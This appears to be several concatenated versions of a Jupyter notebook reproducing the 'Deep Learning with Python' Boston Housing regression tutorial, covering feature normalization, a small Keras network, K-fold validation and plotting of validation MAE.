It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
    # Note: newer Keras versions record this metric under the key 'val_mae'
    # instead of 'val_mean_absolute_error' (check history.history.keys()).
    mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
_____no_output_____
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
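###Markdown
Since every fold records the same number of epochs, the same per-epoch average can be obtained with a single NumPy call. A minimal equivalent sketch (assuming `all_mae_histories` and `average_mae_history` from the cells above):
###Code
# Hedged sketch: vectorized equivalent of the list comprehension above.
average_mae_np = np.mean(np.array(all_mae_histories), axis=0)
np.allclose(average_mae_np, average_mae_history)  # expected: True
###Output
_____no_output_____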
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
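###Markdown
Rather than hard-coding 80 epochs read off the validation curve, Keras can stop training automatically once the validation loss stops improving. This is a minimal sketch, not part of the original example; it assumes `build_model` and the standardized `train_data`/`train_targets` from above, and a Keras version recent enough to support `restore_best_weights`.
###Code
# Hedged sketch: pick the stopping point with an EarlyStopping callback.
# We monitor 'val_loss' so the code does not depend on how the MAE metric
# is named across Keras versions.
from keras.callbacks import EarlyStopping

model = build_model()
early_stop = EarlyStopping(monitor='val_loss', patience=10, restore_best_weights=True)
model.fit(train_data, train_targets,
          validation_split=0.2,
          epochs=500, batch_size=16, verbose=0,
          callbacks=[early_stop])
model.evaluate(test_data, test_targets, verbose=0)
###Output
_____no_output_____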
###Markdown
###Code
import tensorflow
tensorflow.keras.__version__
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from tensorflow.keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
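###Markdown
The same feature-wise standardization can be done with scikit-learn's `StandardScaler`. A minimal sketch, not part of the original example; the arrays above were already standardized in place, so a fresh copy of the data is reloaded here purely to illustrate the API:
###Code
# Hedged sketch: scikit-learn equivalent of the manual standardization above.
from sklearn.preprocessing import StandardScaler

(raw_train, _), (raw_test, _) = boston_housing.load_data()
scaler = StandardScaler()
scaled_train = scaler.fit_transform(raw_train)  # fit on the training data only
scaled_test = scaler.transform(raw_test)        # reuse the training mean/std
###Output
_____no_output_____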
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from tensorflow.keras import models
from tensorflow.keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from tensorflow.keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mae']
all_mae_histories.append(mae_history)
history.history.keys()
###Output
_____no_output_____
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.axis([0,500,2,4.8])
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
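###Markdown
To look at individual predictions rather than an aggregate score, we can call `model.predict` on the (already standardized) test data; like the targets, the outputs are in thousands of dollars. A minimal sketch using the model trained above:
###Code
# Hedged sketch: per-house predictions from the final model, compared with the
# true prices (both in thousands of dollars).
predictions = model.predict(test_data)
print(predictions[:5].ravel())
print(test_targets[:5])
###Output
_____no_output_____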
###Markdown
We are still off by about \$2,550. Wrapping upHere's what you should take away from this example:* Regression is done using different loss functions from classification; Mean Squared Error (MSE) is a commonly used loss function for regression.* Similarly, evaluation metrics to be used for regression differ from those used for classification; naturally the concept of "accuracy" does not apply for regression. A common regression metric is Mean Absolute Error (MAE).* When features in the input data have values in different ranges, each feature should be scaled independently as a preprocessing step.* When there is little data available, using K-Fold validation is a great way to reliably evaluate a model.* When little training data is available, it is preferable to use a small network with very few hidden layers (typically only one or two), in order to avoid severe overfitting.This example concludes our series of three introductory practical examples. You are now able to handle common types of problems with vector data input:* Binary (2-class) classification.* Multi-class, single-label classification.* Scalar regression.In the next chapter, you will acquire a more formal understanding of some of the concepts you have encountered in these first examples, such as data preprocessing, model evaluation, and overfitting.
###Code
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
# # note that due to the error allow_pickle=False, we need to use the slight workaround with numpy
# # from keras.datasets import boston_housing
# # import numpy as np
# # save np.load
# np_load_old = np.load
# # modify the default parameters of np.load
# np.load = lambda *a,**k: np_load_old(*a, allow_pickle=True, **k)
# # call load_data with allow_pickle implicitly set to true
# (train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
# # restore np.load for future normal usage
# np.load = np_load_old
# However, we don't need the workaround if importing from the TensorFlow-bundled datasets:
from tensorflow.keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
# These imports are commented out because `models` and `layers` are already in
# scope from earlier cells in this session; uncomment them when running this
# cell standalone.
# from keras import models
# from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
# import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
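###Markdown
Since every fold records the same number of epochs, the same average can be computed in a single call; an equivalent one-liner (not part of the original notebook):
###Code
# Stack the per-fold histories into a (k, num_epochs) array and average over the fold axis.
average_mae_history_alt = np.mean(np.array(all_mae_histories), axis=0)
###Output
_____no_output_____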
###Markdown
Let's plot this:
###Code
# import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE');
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:

* Omit the first 10 data points, which are on a different scale from the rest of the curve.
* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE');
###Output
_____no_output_____
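###Markdown
The `smooth_curve` helper above is an exponential moving average; if pandas is available, the same smoothing can be obtained with `Series.ewm`. An optional sketch (not part of the original notebook):
###Code
import pandas as pd
# alpha = 1 - factor reproduces smoothed = previous * factor + point * (1 - factor)
smooth_mae_history_pd = pd.Series(average_mae_history[10:]).ewm(alpha=0.1, adjust=False).mean()
###Output
_____no_output_____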
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.

Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
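###Markdown
Once this final model is trained, it can produce price estimates for new (already normalized) feature vectors via `model.predict`; a minimal usage sketch, not part of the original notebook:
###Code
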